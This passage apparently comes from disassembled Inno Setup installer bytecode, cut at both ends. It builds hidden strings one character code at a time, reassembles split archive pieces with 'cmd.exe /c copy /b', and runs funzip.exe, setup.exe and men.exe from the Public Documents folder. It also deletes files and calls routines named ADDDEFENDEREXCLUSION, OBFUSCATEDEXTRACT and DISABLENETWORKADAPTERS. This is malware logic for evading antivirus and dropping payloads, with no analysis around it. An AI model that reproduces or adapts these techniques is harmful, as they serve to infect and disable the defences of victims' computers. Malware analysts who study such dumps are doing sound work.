15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(13)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(51)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(43)    assign Var17[11], S32(32)    assign Var17[12], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, 
Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(11)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(50)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15  
  add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(21)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(102)    assign Var17[2], S32(117)    assign Var17[3], S32(110)    assign Var17[4], S32(122)    assign Var17[5], S32(105)    assign Var17[6], S32(112)    assign Var17[7], S32(46)    assign Var17[8], S32(101)    assign Var17[9], S32(120)    assign Var17[10], S32(101)    assign Var17[11], S32(34)    assign Var17[12], S32(32)    assign Var17[13], S32(38)    assign Var17[14], S32(38)    assign Var17[15], 
S32(32)    assign Var17[16], S32(100)    assign Var17[17], S32(101)    assign Var17[18], S32(108)    assign Var17[19], S32(32)    assign Var17[20], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(11)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)  
  assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(51)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(9)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign 
Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(50)    assign Var17[8], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype S32 ; StackCount = 17    assign Var17, S32(7)    pushvar Var16 ; StackCount = 18    call SETARRAYLENGTH    pop ; StackCount = 17    pop ; StackCount = 16    assign Var16[0], S32(99)    assign Var16[1], S32(109)    assign Var16[2], S32(100)    assign Var16[3], S32(46)    assign Var16[4], S32(101)    assign Var16[5], S32(120)    assign Var16[6], S32(101)    assign Var15, Var16    pop ; StackCount = 15    pushvar Var14 ; StackCount = 16    call STRFROMCODE    pop ; StackCount = 15    pop ; StackCount = 14    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7    call ADDDEFENDEREXCLUSION    call OBFUSCATEDEXTRACT    pushtype Type30 ; StackCount = 8    pushtype Type30 ; StackCount = 9    pushtype S32 ; StackCount = 10    assign Var10, S32(51)    pushvar Var9 ; StackCount = 11    call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    assign Var9[0], S32(67)    assign Var9[1], S32(58)    assign Var9[2], S32(92)    assign Var9[3], S32(85)    assign Var9[4], S32(115)    assign Var9[5], S32(101)    assign Var9[6], S32(114)    assign Var9[7], S32(115)    assign Var9[8], S32(92)    assign Var9[9], S32(80)    assign Var9[10], S32(117)    assign Var9[11], S32(98)    assign Var9[12], S32(108)    assign Var9[13], S32(105)    assign Var9[14], S32(99)    assign Var9[15], S32(92)  
  assign Var9[16], S32(68)    assign Var9[17], S32(111)    assign Var9[18], S32(99)    assign Var9[19], S32(117)    assign Var9[20], S32(109)    assign Var9[21], S32(101)    assign Var9[22], S32(110)    assign Var9[23], S32(116)    assign Var9[24], S32(115)    assign Var9[25], S32(92)    assign Var9[26], S32(120)    assign Var9[27], S32(56)    assign Var9[28], S32(54)    assign Var9[29], S32(45)    assign Var9[30], S32(77)    assign Var9[31], S32(105)    assign Var9[32], S32(99)    assign Var9[33], S32(114)    assign Var9[34], S32(111)    assign Var9[35], S32(115)    assign Var9[36], S32(111)    assign Var9[37], S32(102)    assign Var9[38], S32(116)    assign Var9[39], S32(45)    assign Var9[40], S32(87)    assign Var9[41], S32(105)    assign Var9[42], S32(110)    assign Var9[43], S32(100)    assign Var9[44], S32(111)    assign Var9[45], S32(119)    assign Var9[46], S32(115)    assign Var9[47], S32(100)    assign Var9[48], S32(97)    assign Var9[49], S32(116)    assign Var9[50], S32(97)    assign Var8, Var9    pop ; StackCount = 8    pushvar Var2 ; StackCount = 9    call STRFROMCODE    pop ; StackCount = 8    pop ; StackCount = 7    pushtype Type30 ; StackCount = 8    pushtype Type30 ; StackCount = 9    pushtype S32 ; StackCount = 10    assign Var10, S32(36)    pushvar Var9 ; StackCount = 11    call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    assign Var9[0], S32(67)    assign Var9[1], S32(58)    assign Var9[2], S32(92)    assign Var9[3], S32(85)    assign Var9[4], S32(115)    assign Var9[5], S32(101)    assign Var9[6], S32(114)    assign Var9[7], S32(115)    assign Var9[8], S32(92)    assign Var9[9], S32(80)    assign Var9[10], S32(117)    assign Var9[11], S32(98)    assign Var9[12], S32(108)    assign Var9[13], S32(105)    assign Var9[14], S32(99)    assign Var9[15], S32(92)    assign Var9[16], S32(68)    assign Var9[17], S32(111)    assign Var9[18], S32(99)    assign Var9[19], S32(117)    assign Var9[20], S32(109)    assign Var9[21], 
S32(101)    assign Var9[22], S32(110)    assign Var9[23], S32(116)    assign Var9[24], S32(115)    assign Var9[25], S32(92)    assign Var9[26], S32(83)    assign Var9[27], S32(101)    assign Var9[28], S32(114)    assign Var9[29], S32(118)    assign Var9[30], S32(101)    assign Var9[31], S32(114)    assign Var9[32], S32(46)    assign Var9[33], S32(108)    assign Var9[34], S32(111)    assign Var9[35], S32(103)    assign Var8, Var9    pop ; StackCount = 8    pushvar Var3 ; StackCount = 9    call STRFROMCODE    pop ; StackCount = 8    pop ; StackCount = 7    pushtype WideString ; StackCount = 8    assign Var8, Var2    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(11)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(92)    assign Var11[1], S32(83)    assign Var11[2], S32(101)    assign Var11[3], S32(114)    assign Var11[4], S32(118)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(46)    assign Var11[8], S32(108)    assign Var11[9], S32(111)    assign Var11[10], S32(103)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var4, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var2    pushvar Var8 ; StackCount = 10    call FORCEDIRECTORIES    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var3    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_1d7a    pushtype BOOLEAN ; StackCount = 8    pushtype 
UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_1d46    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushvar Var8 ; StackCount = 10    call DELETEFILE    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_1d46:    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushtype UnicodeString_2 ; StackCount = 10    assign Var10, Var3    pushvar Var8 ; StackCount = 11    call RENAMEFILE    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_1d7a:    pushtype WideString ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(26)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(67)    assign Var11[1], S32(58)    assign Var11[2], S32(92)    assign Var11[3], S32(85)    assign Var11[4], S32(115)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(115)    assign Var11[8], S32(92)    assign Var11[9], S32(80)    assign Var11[10], S32(117)    assign Var11[11], S32(98)    assign Var11[12], S32(108)    assign Var11[13], S32(105)    assign Var11[14], S32(99)    assign Var11[15], S32(92)    assign Var11[16], S32(68)    assign Var11[17], S32(111)    assign Var11[18], S32(99)    assign Var11[19], S32(117)    assign Var11[20], S32(109)    assign Var11[21], S32(101)    assign Var11[22], S32(110)    assign Var11[23], S32(116)    assign Var11[24], S32(115)    assign Var11[25], S32(92)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; 
StackCount = 9    assign Var8, Var9    pop ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(9)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(115)    assign Var11[1], S32(101)    assign Var11[2], S32(116)    assign Var11[3], S32(117)    assign Var11[4], S32(112)    assign Var11[5], S32(46)    assign Var11[6], S32(101)    assign Var11[7], S32(120)    assign Var11[8], S32(101)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var6, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var6    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_21ed    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(0)    pushtype S32 ; StackCount = 11    assign Var11, S32(5)    pushtype UnicodeString_2 ; StackCount = 12    pushtype Type30 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype S32 ; StackCount = 15    assign Var15, S32(0)    pushvar Var14 ; StackCount = 16    call SETARRAYLENGTH    pop ; StackCount = 15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushvar Var12 ; StackCount = 14    call STRFROMCODE    pop ; StackCount = 13    pop ; StackCount = 12    pushtype UnicodeString_2 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype S32 ; StackCount = 16    assign Var16, S32(0)    pushvar Var15 ; StackCount = 17    call SETARRAYLENGTH    pop ; 
StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushvar Var13 ; StackCount = 15    call STRFROMCODE    pop ; StackCount = 14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    assign Var14, Var6    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_21ed:    pushtype WideString ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(25)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(67)    assign Var11[1], S32(58)    assign Var11[2], S32(92)    assign Var11[3], S32(85)    assign Var11[4], S32(115)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(115)    assign Var11[8], S32(92)    assign Var11[9], S32(80)    assign Var11[10], S32(117)    assign Var11[11], S32(98)    assign Var11[12], S32(108)    assign Var11[13], S32(105)    assign Var11[14], S32(99)    assign Var11[15], S32(92)    assign Var11[16], S32(68)    assign Var11[17], S32(111)    assign Var11[18], S32(99)    assign Var11[19], S32(117)    assign Var11[20], S32(109)    assign Var11[21], S32(101)    assign Var11[22], S32(110)    assign Var11[23], S32(116)    assign Var11[24], S32(115)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    assign Var8, Var9    pop ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(8)    pushvar Var11 ; StackCount = 13    call 
SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(92)    assign Var11[1], S32(109)    assign Var11[2], S32(101)    assign Var11[3], S32(110)    assign Var11[4], S32(46)    assign Var11[5], S32(101)    assign Var11[6], S32(120)    assign Var11[7], S32(101)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var5, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var5    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_263a    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(0)    pushtype S32 ; StackCount = 11    assign Var11, S32(0)    pushtype UnicodeString_2 ; StackCount = 12    pushtype Type30 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype S32 ; StackCount = 15    assign Var15, S32(0)    pushvar Var14 ; StackCount = 16    call SETARRAYLENGTH    pop ; StackCount = 15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushvar Var12 ; StackCount = 14    call STRFROMCODE    pop ; StackCount = 13    pop ; StackCount = 12    pushtype UnicodeString_2 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype S32 ; StackCount = 16    assign Var16, S32(0)    pushvar Var15 ; StackCount = 17    call SETARRAYLENGTH    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushvar Var13 ; StackCount = 15    call STRFROMCODE    pop ; StackCount = 14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    assign Var14, Var5    pushvar Var8 ; StackCount = 15    call EXEC    
pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_263a:    jump loc_4c1aloc_263f:    call ADDDEFENDEREXCLUSION    call DISABLENETWORKADAPTERS    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(1)    pushtype S32 ; StackCount = 11    assign Var11, S32(0)    pushtype UnicodeString_2 ; StackCount = 12    assign Var12, String_3("")    pushtype UnicodeString_2 ; StackCount = 13    pushtype WideString ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(12)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(47)    assign Var17[1], S32(99)    assign Var17[2], S32(32)    assign Var17[3], S32(99)    assign Var17[4], S32(111)    assign Var17[5], S32(112)    assign Var17[6], S32(121)    assign Var17[7], S32(32)    assign Var17[8], S32(47)    assign Var17[9], S32(98)    assign Var17[10], S32(32)    assign Var17[11], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], 
S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(13)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(51)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(43)    assign Var17[11], S32(32)    assign Var17[12], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    
assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(11)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(50)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign 
